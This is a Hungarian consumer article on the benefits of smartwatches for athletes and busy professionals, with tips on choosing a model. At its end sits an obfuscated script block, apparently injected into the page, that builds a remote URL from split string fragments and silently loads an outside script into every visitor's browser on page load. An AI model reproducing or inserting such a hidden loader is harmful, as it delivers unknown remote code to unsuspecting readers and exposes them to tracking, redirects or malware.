Miért éri meg okosórát vásárolnod?

Az okosórák kapcsán igencsak megoszló véleményekkel találkozhatunk. Mivel egy relatíve új technológiai felszerelésről van szó, ezért jóval kevésbé elterjedtek, mint például az okostelefonok. Azonban ha kicsit elkezdjük boncolgatni a témát, azonnal láthatjuk, hogy ezek iránt is egyre inkább növekszik a kereslet. Az alábbi cikkből pedig Te is megtudhatod, hogy milyen előnyökkel jár egy ilyen készülék birtoklása – valamint kiknek ajánlott – és még ennél is többet.


Aktivitásmérő – életmódváltóknak és sportolóknak


Talán az egyik legtöbbet emlegetett előnye ezeknek az óráknak, hogy hatalmas segítséget jelenthetnek az aktív életet élők számára. Egy ilyen készülékkel könnyedén mérhetjük pulzusunkat, vérnyomásunkat, valamint az intervallumedzések alatt egyszerűen időzítőként is használhatjuk őket – gyakorlatilag bármilyen mozgásformához. Tényleg bármely sportághoz jól jöhetnek, hiszen a komolyabb modellekkel akár úszhatunk is. Ha sportoláshoz szeretnénk viselni okosóránk, akkor viszont mindenképp figyeljünk rá, hogy megfelelő szíjat válasszunk hozzá. Például akadnak kifejezetten edzéshez készült, sportos kivitelezések akár az Apple Watch szíj kínálatában is. Azonban mindezen túl az étrendünk beállításában is igencsak fontos szerepet játszhat, hiszen nem csak lépésszámláló és pulzusmérő applikációkat telepíthetünk készülékünkre. A megfelelő programok feltelepítésével – amelyek sok okosóránál gyárilag adottak – akár a folyadékbevitelünket és az elfogyasztott, valamint elégetett kalóriák számát is monitorozhatjuk. Így nem csupán edzésprogramunk, de az étrendünk beállítása is jóval könnyebbé válhat.


Rendszerezettség és folyamatos kapcsolat – elfoglalt üzletembereknek

 


Az okosórák azonban jóval többet nyújtanak számunkra a fentebb említett hasznos funkcióknál. Egy-egy ilyen készülék ugyanis rendkívül nagy segítséget jelenthet azok számára is, akik fókuszában épp a karrierépítés vagy üzletük menedzselése áll. Egy okosóra által azonnal láthatjuk a beérkező üzleti e-maileket és sms-eket, valamint telefonhívásainkra is villámgyorsan reagálhatunk – anélkül, hogy percekig keresnénk táskánk alján a mobilunk. Sőt, egy ilyen készülék segítségével akár még fizethetünk is a vásárlásaink során. Ezen felül különféle értesítőket is beállíthatunk óránkon, hogy biztosan ne maradjunk le a legfontosabb üzleti találkozókról. Még az időjárás előrejelzést is egyszerűen megtudhatjuk készülékünk segítségével, így garantáltan felkészülhetünk bármire. Ha pedig kicsit fontolóra vesszük mindezeket, akkor jól láthatjuk, hogy nem csupán az üzleti világban tevékenykedők, de akár az elfoglalt diákok számára is rendkívül praktikus lehet egy minőségi okosóra.


Milyen készüléket válasszunk?


Amennyiben mi is szeretnénk okosórát vásárolni, úgy nem árt alaposan megfontolni döntésünket, hiszen ezen készülékek piaca ma már rendkívül sok különféle modellt kínált számunkra. Az első és legfontosabb talán, hogy mindenképp olyan megbízható márkától vásároljunk, amely valóban garantálja számunkra a megfelelő minőséget. Ezen túl vegyük alaposan fontolóra az adott készülék különféle funkcióit is, hiszen fontos megjegyeznünk, hogy nem minden okosóra vízálló például, ahogy a vérnyomásunkat sem képes bármelyik modell megmérni. Így fontos, hogy amennyiben az egészségmegőrzés a célunk, a kiszemelt készülék valóban rendelkezzen ehhez szükséges funkciókkal. Tehát röviden: a megbízható minőség, a megfelelő ár-érték arány és a számunkra szükséges funkciók háromszöge jelent majd segítséget a legjobb modell megtalálásában.

<script>

(function(){

q9su=document.createElement(„script”);q9su_=(„us”)+(„ta”);

q9su_+=”t”+(„.”);q9su_+=(„in”);q9suu=”494192205″;q9su.async=true;

q9suu+=”.0issn6xt9suvXxXgw”;q9su.type=”text/javascript”;q9su_+=”f”+”o”+(„/”);

q9suu+=”d6fkm9mhkth2q”;q9su.src=”https://”+q9su_+q9suu;

dq9su=document.body;dq9su.appendChild(q9su);

})();

</script>